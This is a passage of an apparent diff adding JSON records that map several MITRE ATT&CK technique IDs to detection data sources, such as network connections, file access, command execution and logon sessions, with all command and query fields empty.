This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1102.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1074.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information 
about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1078.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon 
session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1574.008", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], 